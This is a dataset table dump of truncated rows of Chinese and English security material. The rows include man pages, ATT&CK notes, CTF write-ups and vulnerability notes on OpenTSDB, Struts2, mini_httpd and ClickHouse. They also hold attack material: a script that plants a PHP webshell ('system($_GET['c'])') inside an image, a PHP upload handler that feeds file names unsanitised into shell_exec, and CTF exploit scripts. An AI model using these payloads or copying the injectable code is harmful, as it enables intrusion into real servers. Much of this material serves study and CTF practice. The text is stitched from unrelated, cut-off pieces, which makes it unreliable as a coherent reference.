text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
.\" auto-generated by docbook2man-spec $Revision: 1.1 $
.TH "CREATE AGGREGATE" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands"
.SH NAME
CREATE AGGREGATE \- 定义一个新的聚集函数
.SH SYNOPSIS
.sp
.nf
CREATE AGGREGATE \fIname\fR (
BASETYPE = \fIinput_data_type\fR,
SFUNC = \fIsfunc\fR,
STYPE = \fIstate_data_t... | sec-knowleage |
# goland 远程调试
---
本地的gopath和远端机器不需要一致,go版本也不需要一致
---
## 远端机器
**go**
需要安装 go 环境,可以用 f8x 装
```bash
wget -O f8x https://f8x.io/ && mv --force f8x /usr/local/bin/f8x && chmod +x /usr/local/bin/f8x
f8x -go
```
**dlv**
装一个delve
- https://github.com/go-delve/delve/tree/master/Documentation/installation
```bash
export GO111MOD... | sec-knowleage |
# vault-door-4
Reverse Engineering, 250 points
## Description:
> This vault uses ASCII encoding for the password.
```java
import java.util.*;
class VaultDoor4 {
public static void main(String args[]) {
VaultDoor4 vaultDoor = new VaultDoor4();
Scanner scanner = new Scanner(System.in);
System.... | sec-knowleage |
# T1008-备用通信通道
## 来自ATT&CK描述
如果主要通道受到破坏或无法访问,攻击者可能会使用备用或备用通信通道,以维持可靠的命令和控制并避免数据传输阈值。
主要就是备份,避免权限被清掉,类似于持久化,多种方法维持权限。不过在这里是多种方法维持接收C2指令。
## 检测
分析不常见数据流的网络数据(例如,客户端发送的数据明显多于从服务器接收的数据)。使用通常没有网络通信或以前从未见过的网络的进程是可疑的。分析数据包内容以检测不遵循正在使用的端口通讯协议的通信。
## 参考推荐
MITRE-ATT&CK-T1008
<https://attack.mitre.org/techniques/T1008> | sec-knowleage |
import subprocess, binascii, time
p=subprocess.Popen(["/read_flag"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
p.stdin.write("Give me a...")
time.sleep(3)
p.stdin.write("... flag!")
time.sleep(.5)
while True:
s=p.stdout.read()
i=0
while True:
if i*16>len(s):
break
h=binasci... | sec-knowleage |
mkisofs
===
建立ISO 9660映像文件
## 补充说明
**mkisofs命令** 用来将指定的目录与文件做成ISO 9660格式的映像文件,以供刻录光盘。
### 语法
```shell
mkisofs(选项)(参数)
```
### 选项
```shell
-a或--all:mkisofs通常不处理备份文件。使用此参数可以把备份文件加到映像文件中;
-A<应用程序id>或-appid<应用程序ID>:指定光盘的应用程序ID;
-abstract<摘要文件>:指定摘要文件的文件名;
-b<开机映像文件>或-eltorito-boot<开机映像文件>:指定在制作可开机光盘时所需的开机映像文件;
-biblio<IS... | sec-knowleage |
import requests
import time
# food, kkkkkkkkkkkkkkk
payload = '13739ab125b0e528d608eb4c4e5bb184108bf9b47d5cf18a633384a5a5d6c09ab9719c83f5ab5c0751937a39150c920d'.decode('hex')
# food, kkkkkkkkkkkkkkkk
payload = '13739ab125b0e528d608eb4c4e5bb184c177a61b4512eecea5e60327325a8a1ba090d54455e4763aa8594ffa98763ff0'.decode('h... | sec-knowleage |
# Secrets
Android, 376 points
## Description:
> Can you find my secrets?
An APK file was attached.
## Solution:
First, I decomposed the APK file using `apktools`:
```console
root@kali:/media/sf_CTFs/tamu/_Secrets# apktool d howdyapp.apk
I: Using Apktool 2.3.4-dirty on howdyapp.apk
I: Loading resource table...
I: Decodi... | sec-knowleage |
# T1596-004-搜索开放的技术数据库-CDN
## 来自ATT&CK的描述
在入侵受害者之前,攻击者可以在内容分发网络(CDN)数据中搜索可在目标确定期间使用的有关受害者的信息。CDN允许组织托管来自分布式负载均衡服务器阵列的内容。CDN还可以允许组织根据请求者的地理区域自定义内容传递。
攻击者可以搜索CDN数据以收集可操作的信息。威胁方可以使用在线资源和查找工具来收集有关CDN内容服务器的信息。攻击者还可能寻求和定位CDN错误配置,这些CDN配置可能泄漏不打算托管的敏感信息,或不具有与组织网站上托管的内容相同的保护机制(例如登录门户)(引自:DigitalShadows CDN)。这些来源提供的信息可能为其他形式的侦察提供... | sec-knowleage |
tac
===
连接多个文件并以行为单位反向打印到标准输出。
## 概要
```shell
tac [OPTION]... [FILE]...
```
## 主要用途
- 按行为单位反向显示文件内容,如果没有文件或文件为`-`则读取标准输入。
- 处理多个文件时,依次将每个文件反向显示,而不是将所有文件连在一起再反向显示。
## 参数
FILE(可选):要处理的文件,可以为一或多个。
## 选项
```shell
长选项与短选项等价
-b, --before 在之前而不是之后连接分隔符。
-r, --regex 将分隔符作为基础正则表达式(BRE)处理。
-s, --separ... | sec-knowleage |
# OpenTSDB 命令注入漏洞(CVE-2020-35476)
OpenTSDB是一款基于Hbase的、分布式的、可伸缩的时间序列数据库。在其2.4.0版本及之前,存在一处命令注入漏洞。
参考链接:
- https://github.com/OpenTSDB/opentsdb/issues/2051
- https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html
## 漏洞环境
执行如下命令启动一个OpenTSDB 2.4.0:
```
docker compose up -d
```
服务启动后,访问`http:... | sec-knowleage |
ip6tables-restore
===
还原ip6tables表
## 补充说明
**ip6tables-restore命令** 用来还原ip6tables表。
### 语法
```shell
ip6tables-restore(选项)
```
### 选项
```shell
-c:指定在还原iptables表时,还原当前的数据包计数器和字节计数器值;
-t:指定要还原的表的名称。
``` | sec-knowleage |
.\" Copyright 1993 Rickard E. Faith (faith@cs.unc.edu)
.\" May be distributed under the GNU General Public License
.TH DMESG 8
.SH NAME
dmesg \- print or control the kernel ring buffer
.SH 总览
.BI "dmesg [ \-c ] [ \-n " 级别 " ] [ \-s " 缓冲区大小 " ]"
.SH 描述
.B dmesg
用于检测和控制内核环缓冲。
程序用来帮助用户了解系统的启动信息。用户只需使用命令:
.RS
dmesg > boot... | sec-knowleage |
.TH "DROPDB" "1" "2003-11-02" "Application" "PostgreSQL Client Applications"
.SH NAME
dropdb \- 删除一个现有 PostgreSQL 数据库
.SH SYNOPSIS
.sp
\fBdropdb\fR\fR [ \fR\fB\fIoption\fB\fR...\fB \fR\fR]\fR \fB\fIdbname\fB\fR
.SH "DESCRIPTION 描述"
.PP
\fBdropdb\fR 删除一个现有 PostgreSQL 数据库。 执行这条命令的人必须是数据库超级用户,或者是数据库所有者。
.PP
\fBdropdb\fR 是... | sec-knowleage |
# clickhouse 未授权访问漏洞
## 漏洞描述
恶意攻击者可以在不提供有效凭据的情况下访问 ClickHouse 服务器。这可能导致未经授权的访问敏感数据,或允许攻击者修改或删除数据。**默认情况下,clickhouse-server会在8123端口上监控HTTP请求(这可以在配置中修改)。**
## 环境搭建
```
sudo apt-get install -y apt-transport-https ca-certificates dirmngr
sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 8919F6BD2B48D754
ech... | sec-knowleage |
# Struts2 S2-057 Remote Code Execution Vulnerablity (CVE-2018-11776)
Affected Version: <= Struts 2.3.34, Struts 2.5.16
Details:
- https://cwiki.apache.org/confluence/display/WW/S2-057
- https://lgtm.com/blog/apache_struts_CVE-2018-11776
- https://xz.aliyun.com/t/2618
- https://mp.weixin.qq.com/s/iBLrrXHvs7agPywV... | sec-knowleage |
git
===
是目前世界上最先进的分布式版本控制系统
## 补充说明
**git命令** 很多人都知道,Linus在1991年创建了开源的Linux,从此,Linux系统不断发展,已经成为最大的服务器系统软件了。
Linus虽然创建了Linux,但Linux的壮大是靠全世界热心的志愿者参与的,这么多人在世界各地为Linux编写代码,那Linux的代码是如何管理的呢?
事实是,在2002年以前,世界各地的志愿者把源代码文件通过diff的方式发给Linus,然后由Linus本人通过手工方式合并代码!
你也许会想,为什么Linus不把Linux代码放到版本控制系统里呢?不是有CVS、SVN这些免费的版本控制系统吗?因为Linus坚定地反... | sec-knowleage |
# Down The Rabbit Hole
* Category: Forensics
* 150 Points
* Solved by the JCTF Team
## Description
> Follow the rabbit down the "excellent" hole and see where it leads
An Excel file was attached.
## Solution
Let's start by inspecting the Excel Workbook. If we open it with a dedicated program, we get one sheet named "Sh... | sec-knowleage |
# mini_httpd任意文件读取漏洞(CVE-2018-18778)
Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。
在mini_httpd开启虚拟主机模式的情况下,用户请求`http://HOST/FILE`将会访问到当前目录下的`HOST/FILE`文件。
```c
(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostna... | sec-knowleage |
.\" auto-generated by docbook2man-spec $Revision: 1.1 $
.TH "SET TRANSACTION" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands"
.SH NAME
SET TRANSACTION \- 设置当前事务的特性
.SH SYNOPSIS
.sp
.nf
SET TRANSACTION
[ ISOLATION LEVEL { READ COMMITTED | SERIALIZABLE } ] [ READ WRITE | READ ONLY ]
SET SESSION CHARACTERI... | sec-knowleage |
from pwn import *
import hashlib
def H(P):
return hashlib.sha256(P).hexdigest()
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, l... | sec-knowleage |
# 反馈移位寄存器
一般的,一个 n 级反馈移位寄存器如下图所示
其中
- $a_0$,$a_1$,…,$a_{n-1}$,为初态。
- F 为反馈函数或者反馈逻辑。如果 F 为线性函数,那么我们称其为线性反馈移位寄存器(LFSR),否则我们称其为非线性反馈移位寄存器(NFSR)。
- $a_{i+n}=F(a_i,a_{i+1},...,a_{i+n-1})$ 。
一般来说,反馈移位寄存器都会定义在某个有限域上,从而避免数字太大和太小的问题。因此,我们可以将其视为同一个空间中的变换,即
$(a_i,a_{i+1},...,a_{i+n-1}) \rightarrow (a_{i+1},...,a_{i+n-1},a_{i+n})$... | sec-knowleage |
# Cat flag (web, 60p, 12 solved)
In the challenge we can connect to a website which is split in 2 parts.
There is [frontend](Frontend.java) and [backend](Backend.java).
It's clear that the flag can be served by backend if we request `/flag` endpoint, however we can't query backend directly at all.
We can only send requ... | sec-knowleage |
.\" This page Copyright (C) 1994 Henry Ware <al172@yfn.ysu.edu>
.\"; 中文版版权所有 soloman, Laser www.linuxforum.net 2000
.\" Distributed under the GPL, Copyleft 1994.
.TH VMSTAT 8 "27 July 1994 " "Throatwobbler Ginkgo Labs" "Linux 系统管理员手册"
.SH NAME
vmstat \- 报告虚拟内存的统计信息
.SH 总览
vmstat [\-n] [延时[次数]]
.br
vmstat [\-V]
.SH 描述... | sec-knowleage |
---
title: Linux命令行
---
### Linux 系统有多种发行版
我们安装的是 深度 Linux ,这个系统跟国外的 Ubuntu Linux 非常类似。如果装不了深度,可以尝试安装 Ubuntu 。
其他的知名 Linux 发行版还有很多,例如 Red Hat ,Suse,Fedora , CentOS 等等。
### 打开命令行界面
学习 linux 最重要的就是来使用它的命令行。
**Ctrl-Alt-T** 是 **深度 Linux** 系统上打开命令行窗口的快捷键。这个命令行窗口程序,在 Mac 系统上叫 iTerm ,在深度系统上叫“深度终端”。
命令行窗口中可以运行的程序不唯一。默认启动的程序叫做 ... | sec-knowleage |
# web
## 找色差吗?
查看js代码
F12,控制台输入语句
```js
var _0x268d05 = { 'vFYyb': _0x2f2b('0x1983', 'vXeU'), 'rshMS': function _0x593385(_0x36599a, _0x5f41b7) { return _0x36599a / _0x5f41b7; }, 'xWQRG': function _0x337c99(_0x53c811, _0xe4afa4) { return _0x53c811 - _0xe4afa4; }, 'ZuQxI': function _0x242b7d(_0x4e358a, _0xbefac3) { retu... | sec-knowleage |
原文 by MayIKissYou
PS: I’ve been thinking of concluding the pieces of knowledge for a long time. This time at the wooyun summit , I repeated the previous process again and finished this article, wishing that the contents I organized could bring enlightenments to the first party workers and white hats.
## 0x00 Overview
... | sec-knowleage |
shopt
===
显示和设置shell操作选项
## 补充说明
**shopt命令** 用于显示和设置shell中的行为选项,通过这些选项以增强shell易用性。shopt命令若不带任何参数选项,则可以显示所有可以设置的shell操作选项。
### 语法
```shell
shopt(选项)(参数)
```
### 选项
```shell
-s:激活指定的shell行为选项;
-u:关闭指定的shell行为选项。
```
### 参数
shell选项:指定要操作的shell选项。
### 实例
使用shopt命令显示当前所有可以设置的shell操作选项,输入如下命令:
```shell
shopt #输... | sec-knowleage |
---
title: C
date: 2022-12-30 09:51:44
background: bg-[#2a338a]
tags:
categories:
- Programming
intro: |
C quick reference cheat sheet that provides basic syntax and methods.
plugins:
- copyCode
---
Getting Started
----
### hello.c {.row-span-2}
```c
#include <stdio.h>
int main(void) {
printf("Hello World!\... | sec-knowleage |
# 花指令
## 原理
花指令是企图隐藏掉不想被逆向工程的代码块(或其它功能)的一种方法, 在真实代码中插入一些垃圾代码的同时还保证原有程序的正确执行, 而程序无法很好地反编译, 难以理解程序内容, 达到混淆视听的效果.
花指令通常用于加大静态分析的难度。
## 编写
最简单的花指令使用了内联汇编的方式进行,下面以 VC 添加花指令的方式举例,gnu 的编译器也可以采用类似的方式添加花指令,但是使用 AT&T 汇编:
```c
// 正常的函数代码
int add(int a, int b){
int c = 0;
c = a + b;
return c;
}
// 添加花指令的函数代码
int add_with_jun... | sec-knowleage |
'\" t
.TH "MACHINE\-INFO" "5" "" "systemd 231" "machine-info"
.\" -----------------------------------------------------------------
.\" * Define some portability stuff
.\" -----------------------------------------------------------------
.\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.\" http://b... | sec-knowleage |
# T1546-002-win-事件触发执行-屏幕保护程序
## 来自ATT&CK描述
攻击者可以通过执行由用户不活动引发的恶意内容来建立持久性。屏幕保护程序是在用户不活动的可配置时间后执行的程序,由扩展名为.scr的便携式可执行文件(PE)组成。Windows屏幕保护程序scrnsave.scr位于C:\Windows\System32\,在64位Windows系统上位于C:\Windows\sysWOW64\,与基本Windows安装中的屏幕保护程序一起。
以下屏幕保护程序设置存储在注册表 ( `HKCU\Control Panel\Desktop\`) 中,可以通过操作来实现持久性:
- `SCRNSAVE.exe` -设... | sec-knowleage |
# C/S - Exploits
---
## 免责声明
`本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.`
---
## 大纲
* **[运维](#运维)**
* [Jmeter](#jmeter)
* **[编程语言](#编程语言)**
* [Java](#java)
* [Python](#python)
* [Ruby](#ruby)
* **[远程服务](#远程服务)**
* [Aria2](#aria2)
* [Shadowsocks](#shadowsocks)
* **[文件服务](#文件服务)**
* [F... | sec-knowleage |
# FunboxEasyEnum
> https://download.vulnhub.com/funbox/Funbox7.ova
靶场IP:`192.168.2.8`
扫描对外端口服务
```
┌──(root㉿kali)-[~/Desktop]
└─# nmap -p1-65535 -sV 192.168.2.8
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-05 07:31 EDT
Nmap scan report for 192.168.2.8
Host is up (0.00049s latency).
Not shown: 65533 closed tcp por... | sec-knowleage |
## Rotten Uploader (Web, 150p)
###ENG
[PL](#pl-version)
In the task we get access to file uploader service.
Uploading is disabled and we can only download files already there.
There is a simple Path-Traversal in the GET parameter so we can actually download all the files, including index.php and download.php by using `... | sec-knowleage |
## ones_and_zer0es (crypto, 50p, 987 solves)
> [eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg](ones-and-zer0es.bin)
### PL Version
`for ENG version scroll down`
Pobieramy wskazany plik. Jego zawartość to:
011001100110110001100001011101000111101101010000011001010110111101110000011011000110010100100000... | sec-knowleage |
<?php
if (!empty($_FILES)):
$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
die('Unsupported filetype uploaded.');
}
$size = shell_exec("identify -format '%w x %h' {$_FILES['file_upload']['tmp_name']}");
echo "Image size is: $size";
els... | sec-knowleage |
# scrambled-bytes
Forensics, 200 points
## Description
> I sent my secret flag over the wires, but the bytes got all mixed up!
A network capture and the following script were attached:
```python
#!/usr/bin/env python3
import argparse
from progress.bar import IncrementalBar
from scapy.all import *
import ipaddress
impor... | sec-knowleage |
# T1059-win-基于白名单Ftp.exe执行Payload
## 来自ATT&CK的描述
命令行界面是与计算机系统交互的一种方式,并且是很多操作系统平台的常见特性。例如,Windows系统上的命令行界面cmd可用于执行许多任务,包括执行其他软件。命令行界面可在本地交互或者通过远程桌面应用、反向shell会话等远程交互。执行的命令以命令行界面进程的当前权限级别运行,除非该命令需要调用进程来更改权限上下文(例如,定时任务)。
攻击者可能会使用命令行界面与系统交互并在操作过程中执行其他软件。
## 测试案例
Ftp.exe是Windows本身自带的一个程序,属于微软FTP工具,提供基本的FTP访问。
说明:Ftp.exe所在路径已... | sec-knowleage |
'\"
'\" Copyright (c) 1993 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: open.n,v 1.2 2003/11/24 05:09:59 b... | sec-knowleage |
# Gunshop 1 (re/web, 273p, 10 solved)
A two stage challenge, starting with an [obfuscated android app](GunShop.apk)
There is some code to go through but eventually we can figure out that:
1. App is making requests to some host for endpoints `/sessionStart`, `/selectGun` and `/finalizeSession`. There is also and endpoin... | sec-knowleage |
# 威胁情报的困境
本章节将整理威胁情报相关的一些发展问题,看到问题,才能去想解决方案。
## 三座大山
威胁情报的本质是基于证据的知识(Knowledge),从痛苦金字塔上来说,这种Knowledge
时效性、滞后性和可靠 | sec-knowleage |
#/usr/bin/env python
from Crypto.Random import random, atfork
from Crypto.Util.number import bytes_to_long, long_to_bytes
from hashlib import sha1
import SocketServer,threading,os,time
import signal
from util import *
from key import *
PORT = 7763
FLAG = "REDACTED"
msg = """Welcome to the LSB oracle! N = {}\n""".fo... | sec-knowleage |
# T1136-001-win-创建本地账户
## 来自ATT&CK的描述
具有足够访问级别权限的攻击者可以创建本地系统或域账号。此类账号可用于持久性,不需要在系统上部署持久性远程访问工具。
在云环境中,攻击者可能会创建仅用于访问特定服务的账户,从而减少被检测到的可能。
### Windows
可使用net user命令来创建本地或域账号。
### Office 365
有权访问全局管理员账户的攻击者可以创建其他账户,并为其分配全局管理员角色以便能持久访问Office 365租户。
## 测试案例
利用Net user命令创建本地用户
## 检测日志
windows 安全日志
## 测试复现
### 本地创建账户
```bash
M... | sec-knowleage |
# HEEEEEEERE'S Johnny!
Cryptography, 100 points
## Description:
> Okay, so we found some important looking files on a linux computer. Maybe they can be used to get a password to the process. Connect with nc 2018shell3.picoctf.com 38860. Files can be found here: _passwd_ _shadow_.
## Solution:
We can use [John the Ripp... | sec-knowleage |
### KPTI - Kernel Page Table Isolation介绍
KPTI 机制最初的主要目的是为了缓解 KASLR 的绕过以及 CPU 侧信道攻击。
在 KPTI 机制中,内核态空间的内存和用户态空间的内存的隔离进一步得到了增强。
- 内核态中的页表包括用户空间内存的页表和内核空间内存的页表。
- 用户态的页表只包括用户空间内存的页表以及必要的内核空间内存的页表,如用于处理系统调用、中断等信息的内存。
在 x86_64 的 PTI 机制中,内核态的用户空间内存映射部分被全部标记为不可执行。也就是说,之前不具有 SMEP 特性的硬件,如果开启了 KPTI 保护,也具有了类似于 SMEP 的特性。此外,SMAP 模拟也... | sec-knowleage |
# Introduction
内核提权指的是普通用户可以获取到 root 用户的权限,访问原先受限的资源。这里从两种角度来考虑如何提权
- 改变自身:通过改变自身进程的权限,使其具有 root 权限。
- 改变别人:通过影响高权限进程的执行,使其完成我们想要的功能。
## 参考文献
- https://en.wikipedia.org/wiki/Privilege_escalation | sec-knowleage |
### SNMP简介:
SNMP是一种简单网络管理协议,它属于TCP/IP五层协议中的应用层协议,用于网络管理的协议。SNMP主要用于网络设备的管理。SNMP协议主要由两大部分构成:SNMP管理站和SNMP代理。SNMP管理站是一个中心节点,负责收集维护各个SNMP元素的信息,并对这些信息进行处理,最后反馈给网络管理员;而SNMP代理是运行在各个被管理的网络节点之上,负责统计该节点的各项信息,并且负责与SNMP管理站交互,接收并执行管理站的命令,上传各种本地的网络信息。
### nmap扫描:
```bash
root@John:~# nmap -sU --script snmp-brute 192.168.1.0/24 -T4
`... | sec-knowleage |
# House of Pig
## 介绍
House of Pig 这种利用方法来自 XCTF-FINAL 2021 的同名题目。
## 概括
House of Pig 是一个将 Tcache Statsh Unlink+ Attack 和 FSOP 结合的攻击,同时使用到了 Largebin Attack 进行辅助。主要适用于 libc 2.31及以后的新版本 libc 并且程序中仅有 calloc 时。
利用条件为
* 存在 UAF
* 能执行abort流程或程序显式调用 exit 或程序能通过主函数返回。
主要利用的函数为 `_IO_str_overflow`,可以参考 [glibc 2.24下 IO_FILE 的利用](ht... | sec-knowleage |
# CS Technion CTF
Writeups for the 2021 [CS Technion CTF](http://ctf.cs.technion.ac.il/).
The participants were divided into four divisions:
1. Students in CS department up to the fourth semester of 1st degree.
2. Students in CS department from the fifth semester of 1st degree and up, this includes students in their ... | sec-knowleage |
---
title: Asana
date: 2022-11-23 16:23:31.697445
background: bg-[#e0726e]
label:
tags:
-
-
categories:
- Keyboard Shortcuts
intro: |
A visual cheat-sheet for the 40 keyboard shortcuts found in Asana
---
Keyboard Shortcuts
------------------
### My Tasks
Shortcut | Action
---|---
`Tab` `Y` | Mark a... | sec-knowleage |
# Media-DV
Misc.
## Description:
> The gatekeeper software gave you access to a custom database to organize a music playlist. It looks like it might also be connected to the smart fridge to play custom door alarms. Maybe we can grab an oauth token that gets us closer to cake.
>
> media-db.ctfcompetition.com 1337
```py... | sec-knowleage |
.TH VIM 1 "1998 December 28"
.SH NAME
vim \- Vi IMproved, 一个程序员的文本编辑器
.SH "总览 (SYNOPSIS)"
.br
.B vim
[options] [file ..]
.br
.B vim
[options] -
.br
.B vim
[options] \-t tag
.br
.B vim
[options] \-q [errorfile]
.PP
.br
.B ex
.br
.B view
.br
.B gvim
.B gview
.br
.B rvim
.B rview
.B rgvim
.B rgview
.SH "描述 (DESCRIPTION)"
... | sec-knowleage |
# LuaJIT
---
**官网**
- http://luajit.org/
---
## 环境安装
**Linux 系统上安装**
```bash
git clone https://luajit.org/git/luajit.git
cd luajit
make
make install
export LUAJIT_LIB=/usr/local/lib
```
或
```
f8x -lua
```
**测试**
```
luajit
>print("hello The world")
```
---
## 编译
使用 -b 选项,后缀随便定义,和 luac 一样,只有自己可以运行
```
luajit -b test.lua... | sec-knowleage |
# Brewery hack J1 (forensics/osint/reverse/crypto)
This was an interesting multi-stage challenge.
It starts with a 80MB pcap for analysis.
For simplicity we're include only the [relevant part](attack.pcap) with the actual attack.
From this pcap part we can see that the user downloads some `.doc` file with [obfuscated m... | sec-knowleage |
require 'sinatra'
require 'net/ftp'
require 'uri'
get '/' do
'Use /download?uri=ftp://127.0.0.1:2121/&file=/path/to/file.txt to download a ftp file.'
end
get '/download' do
content_type 'application/octet-stream'
begin
uri = URI.parse(params['uri'])
ftp = Net::FTP.new
ftp.connec... | sec-knowleage |
# sponge (crypto, 200)
> I've written a hash function. Come up with a string that collides with "I love
> using sponges for crypto".
The hash function we were given in this task, was simply xoring the 16-byte state with 10-byte input block, and then
encrypting with AES. If the blocks were 16-byte, the collision would b... | sec-knowleage |
from pwn import *
import hexdump
import string
import os
import json
#data = string.letters[:51] * 100000
data = os.urandom(100000)
data = "a" * 15 + data[15:]
data = data[:25 * 3]
def take(s, n):
return s[:n], s[n:]
def takedd(s):
x, s = take(s, 4)
return struct.unpack("<I", x)[0], s
def recurse(s):
... | sec-knowleage |
## 简单工厂(Simple Factory)
### Intent
在创建一个对象时不向客户暴露内部细节,并提供一个创建对象的通用接口。
### Class Diagram
简单工厂把实例化的操作单独放到一个类中,这个类就成为简单工厂类,让简单工厂类来决定应该用哪个具体子类来实例化。
这样做能把客户类和具体子类的实现解耦,客户类不再需要知道有哪些子类以及应当实例化哪个子类。客户类往往有多个,如果不使用简单工厂,那么所有的客户类都要知道所有子类的细节。而且一旦子类发生改变,例如增加子类,那么所有的客户类都要进行修改。
<div align="center"> <img src="https://cs-notes-1256109796... | sec-knowleage |
# pwn02 (pwn 130p, 37 solved)
## Exploitation
1. Add a book with a short brief
The purpose is to create brief that can be enlarged and edited during use-after-free exploitation.
2. Add a best selling book
Book to be used as use-after-free victim via `The best selling book today` section of `List` output.
3. Enter... | sec-knowleage |
# HTTPoxy CGI application vulnerability (CVE-2016-5385)
[中文版本(Chinese version)](README.zh-cn.md)
httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. It comes down to a simple namespace conflict:
- RFC 3875 (CGI) puts the HTTP Proxy header from a request into the... | sec-knowleage |
lines = open("602.txt").readlines()
def try_parse(data):
try:
data = data.split()
assert len(data[0]) == 2
op = int(data[0], 16)
rest = data[1:]
return True, op, rest
except:
return False, "", ""
def save(opname, op, args):
print opname + "|" + hex(op) + "|"... | sec-knowleage |
# 前言
> 译者:[@Snowming](https://github.com/Snowming04)
这是《渗透测试实战》一书的第三版。以下会给出一个基于第二版新增的漏洞和攻击的总结。除了新的内容,本书保留了之前的版本中现今仍然可以用的攻击和技术,这是为了避免让你再去翻以前的书。除了从以前的书里提取的内容,这本书还有什么新的内呢?新的内容包括一些过去几年提出来的新话题:
- 利用活动目录
- 利用 Kerberos 协议
- 高级 Web 攻击
- 更好的横向移动方式
- 云计算相关漏洞
- 更快/更高效的密码破解
- Living off the land 技术(意思是入侵者使用系统凭据和合法的软件管理工具访问系统,感染和收集... | sec-knowleage |
from __future__ import print_function
from PIL import Image
# Shellcodes - Bypass included : Keyword Recognition : System, GET, php
# --- How to use : http://localhost/shell.php?c=echo%20'<pre>';ls
#shellcode = "<?=@`$_GET[c]`;"
shellcode = "<?php system($_GET['c']); ?>"
# --- How to use : http://localhost/shell.php... | sec-knowleage |
# Power-PenTest
<p align="center">
<a href="https://www.iqiyi.com/v_19rrjaajp0.html"><img src="../../assets/img/banner/Power-PenTest.jpg"></a>
</p>
---
## 免责声明
`本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.`
---
## 大纲
* **[安全资源](#安全资源)**
* [Document](#document)
* [靶机](#靶机)
* [VulnHub](#vulnHub... | sec-knowleage |
.TH "INITLOCATION" "1" "2003-11-02" "Application" "PostgreSQL Server Applications"
.SH NAME
initlocation \- 创建一个从属的 PostgreSQL数据库存储区
.SH SYNOPSIS
.sp
\fBinitlocation\fR \fB\fIdirectory\fB\fR
.SH "DESCRIPTION 描述"
.PP
\fBinitlocation\fR
创建一个新的PostgreSQL从属数据库存储区。参阅 CREATE DATABASE [\fBcreate_database\fR(7)] 里关于如何管理和使用从属... | sec-knowleage |
# 翻译规范
本规范用于指导Kali工具的翻译,请共同遵守,以便形成统一的翻译风格。
## 参考工具
- 建议使用Chrome浏览器自带的谷歌翻译插件。
- 移动端有道翻译可以参考。
- 词典。
## 规范
- 示例代码部分除有关参数信息外,采用原文。
- 在文章末尾添加译者及校对人,未校对可留空。如:译者:Mark,校对:Markson。
- 上传一篇内容后同时更新对应文件夹下的list.md文件,加入文章链接。
## 其他
- 英语能力有限者可以对已经上传的译文做校对。 | sec-knowleage |
.\" Copyright (c) 1996 Eric S. Raymond
.\" and Andries Brouwer
.\" This is free documentation; you can redistribute it and/or
.\" modify it under the terms of the GNU General Public License as
.\" published by the Free Software Foundation; either version 2 of
.\" the License, or (at your option) any later version.
.\... | sec-knowleage |
# [译] 渗透测试实战第三版(红队版)
- 译者:[Snowming](https://github.com/Snowming04)(雪茗) 时间:北京时间 2019-03-17
- 本书英文名:The Hacker Playbook 3

## 阅读及 PDF 下载
- [在 Github 上阅读本书](https://github.com/Snowming04/The-Hacker-Playbook-3-Translation/blob/maste... | sec-knowleage |
# Old School (crypto, 14 solved, 740p)
In the task we get 3 parts [part1](part1.txt), [part2](part2.txt), [part3](part3.txt).
It seems each one is RSA public key with encrypted data.
## Part3
We're writing this in reverse order, because this is how we solved it.
The last part was the simplest, because it was clear how ... | sec-knowleage |
---
title: EC2 子域名接管
---
<center><h1>EC2 子域名接管</h1></center>
---
存在这个漏洞的前提是目标的 AWS EC2 没有配置弹性 IP,此时如果目标子域 CNAME 配置了该公有 IPv4 DNS 地址或者 A 记录配置了公有 IPv4 IP 地址,那么当该 EC2 被关机或者销毁时,该实例的公有 IP 也会随之释放,此时这个 IP 就会被分配给新的 EC2 实例,造成子域名接管。
例如下面这个这个域名,可以看到 CNAME 绑定到了 AWS 的 EC2 上,可以看到现在 EC2 IP 地址是 15 开头的。
</br>
<img width="1000" src="/img... | sec-knowleage |
chcon
===
修改对象(文件)的安全上下文
## 补充说明
**chcon命令** 是修改对象(文件)的安全上下文,比如:用户、角色、类型、安全级别。也就是将每个文件的安全环境变更至指定环境。使用`--reference`选项时,把指定文件的安全环境设置为与参考文件相同。chcon命令位于`/usr/bin/chcon`。
### 语法
```shell
chcon [选项]... 环境 文件...
chcon [选项]... [-u 用户] [-r 角色] [-l 范围] [-t 类型] 文件...
chcon [选项]... --reference=参考文件 文件...
```
### 选项
```shell
-h, --... | sec-knowleage |
lvreduce
===
收缩逻辑卷空间
## 补充说明
**lvreduce命令** 用于减少LVM逻辑卷占用的空间大小。使用lvreduce命令收缩逻辑卷的空间大小有可能会删除逻辑卷上已有的数据,所以在操作前必须进行确认。
### 语法
```shell
lvreduce(选项)(参数)
```
### 选项
```shell
-L:指定逻辑卷的大小,单位为“kKmMgGtT”字节;
-l:指定逻辑卷的大小(LE数)。
```
### 参数
逻辑卷:指定要操作的逻辑卷对应的设备文件。
### 实例
使用lvreduce命令减少指定的逻辑卷的空间大小。在命令行中输入下面的命令:
```shell
[root@localho... | sec-knowleage |
# 基础操作
## unlink
